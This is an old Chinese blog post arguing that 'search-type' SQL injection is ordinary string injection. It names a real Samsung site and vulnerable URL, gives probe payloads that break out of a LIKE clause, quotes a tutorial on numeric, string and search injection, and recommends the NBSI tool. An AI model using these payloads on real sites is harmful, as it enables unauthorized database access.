搜索型注入之我看---注入不分家
时间:2009-04-23 18:29:00
勇哥信誓旦旦的写了个搜索型注入的文章,而且很多人看了觉得不错
我不这么认为,注入就是注入,哪里有分什么搜索型?看官们觉得新奇的地方就是他们用普通的注入探测,很多软体不能搜索到注入点而已!
今天看到 黑客基地 有个关于搜索型注入的文章,用到的是勇哥的技术,借此机会我来发发牢骚。
他探测的是三星:http://notebook.samsung.com.cn/index.aspx
注入方式是:
一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
我们知道一般搜索代码是这么写的:
Select * from 表名 where 字段 like ’%关键字%’
这样就造成了对关键字前后的所有匹配(%是用来全部匹配的)
这里如果关键字没有过滤的话,就可以这样来构造:
关键字=’ and [查询条件] and ‘%25’=’
这样查询就变成
select * from 表名 where 字段 like '%' and 1=1 and '%'='%'
这样就很好的构成了一个sql注入点,当然用手工也可以,用nbsi也可以~~
注入是不分家的,没必要什么型什么型的!~
如果不信,大家请看下面的《sql注入天书》的原话
第一节、SQL注入的一般步骤
首先,判断环境,寻找注入点,判断数据库类型,这在入门篇已经讲过了。
其次,根据注入参数类型,在脑海中重构SQL语句的原貌,按参数类型主要分为下面三种:
(A) ID=49 这类注入的参数是数字型,SQL语句原貌大致如下:
Select * from 表名 where 字段=49
注入的参数为ID=49 And [查询条件],即是生成语句:
Select * from 表名 where 字段=49 And [查询条件]
(B) Class=连续剧 这类注入的参数是字符型,SQL语句原貌大致概如下:
Select * from 表名 where 字段=’连续剧’
注入的参数为Class=连续剧’ and [查询条件] and ‘’=’ ,即是生成语句:
Select * from 表名 where 字段=’连续剧’ and [查询条件] and ‘’=’’
(C) 搜索时没过滤参数的,如keyword=关键字,SQL语句原貌大致如下:
Select * from 表名 where 字段like ’%关键字%’
注入的参数为keyword=’ and [查询条件] and ‘%25’=’, 即是生成语句:
Select * from 表名 where字段like ’%’ and [查询条件] and ‘%’=’%’
当然手工是麻烦的
用工具的话,我建议用nbsi的工具比较好,就我感觉只有nbsi结合了这个技术,用别的软体是不能注入的
注入点只要写:
http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=%
再加个特征字符就可以了


猜你喜欢
从硬盘轻松安装 Mandrake 9.0 beta4
利用分类信息平台进行有效的网上推广
织梦dedecms网站六大SEO优化技巧分享
分享高校论坛建设管理心得
Serv-U域自动离线

详解如何在阿里云服务器部署程序并用域名直接访问

成功站长要做到的几个坚持
选择合适自己的服务器
Apache的ReWrite的应用mod_rewrite模块使用
五大类二十五个改善网站提高浏览量的方法
网站关键词选取技巧:正确简练并具代表性
在Idea中使用Docker部署SpringBoot项目的详细步骤

展现最优质内容 正确配置Robots文件
详解Ubuntu下配置samba实现文件夹共享
eWeek:微软击退Chrome OS进攻应做的10件事
SEO也要具体问题具体分析
Godaddy主机如何设置开通Access数据库?
Xitami Web服务器,比Apache更快捷
妙手回春,化解服务器登录难题(2)
